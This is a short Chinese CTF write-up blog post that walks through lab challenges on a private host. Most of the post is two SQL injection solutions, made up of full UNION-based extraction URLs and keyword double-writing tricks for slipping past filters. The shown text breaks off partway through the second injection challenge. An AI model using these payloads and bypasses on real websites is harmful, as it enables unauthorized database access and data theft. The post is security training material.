一套基础的CTF_writeup

作者: Sec小玖 | 来源:发表于2017-12-13 20:12 被阅读0次

1.请找到flag

右键查看源代码，找到flag

2.find me

使用御剑扫描后台目录，发现robots.txt，打开发现flag

3.sql注入

（1）判断是否存在注入

输入http://192.168.253.133:82/search1.php?id=1 and 1=1

输入http://192.168.253.133:82/search1.php?id=1 and 1=2

发现存在数字型SQL注入

（2）获取列数：

http://192.168.253.133:82/search1.php?id=1 order by 6

http://192.168.253.133:82/search1.php?id=1 order by 7 出错

确定列数为6列

（3）爆数据库名

http://192.168.253.133:82/search1.php?id=1 and 1=2 union select 1,database(),3,4,5,6

http://192.168.253.133:82/search1.php?id=1 and 1=2 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata

（4）爆表名

http://192.168.253.133:82/search1.php?id=1 and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema='xxxx'

（5）爆列名

http://192.168.253.133:82/search1.php?id=1 and 1=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name='flag'

（6）爆字段值

http://192.168.253.133:82/search1.php?id=1 and 1=2 union select 1,your_flag,3,4,5,6 from flag where Id=2

得到flag

4.SQL注入2

（1）判断注入点

输入 and 1=1，提示禁止出现空白字符，使用注释符替换空格。

发现成功输出，但是and被过滤了，尝试 andand 以及 anandd等形式进行绕过。

双写andand，仍然被过滤

尝试anandd，发现成功绕过

输入http://192.168.253.133:83/search3.php?id=1/**/anandd/**/1=2，发现显示为空，确定存在数字型注入

（2）判断列数

输入http://192.168.253.133:83/search3.php?id=1/**/order/**/by/**/6，发现or被过滤了

同样双写or绕过，发现order by并没有被过滤

当输入http://192.168.253.133:83/search3.php?id=1/**/oorrder/**/by/**/7，提示第7列不存在，确定为6列

（3）爆数据库名

http://192.168.253.133:83/search3.php?id=-1/**/uunionnion/**/seselectlect/**/1,2,group_concat(schema_name),4,5,6/**/from/**/infoorrmation_schema.schemata

（4）爆表名

http://192.168.253.133:83/search3.php?id=-1/**/uunionnion/**/seselectlect/**/1,2,group_concat(table_name),4,5,6/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='dky2'

（5）爆列名

http://192.168.253.133:83/search3.php?id=-1/**/uunionnion/**/seselectlect/**/1,2,group_concat(column_name),4,5,6/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='your_flag'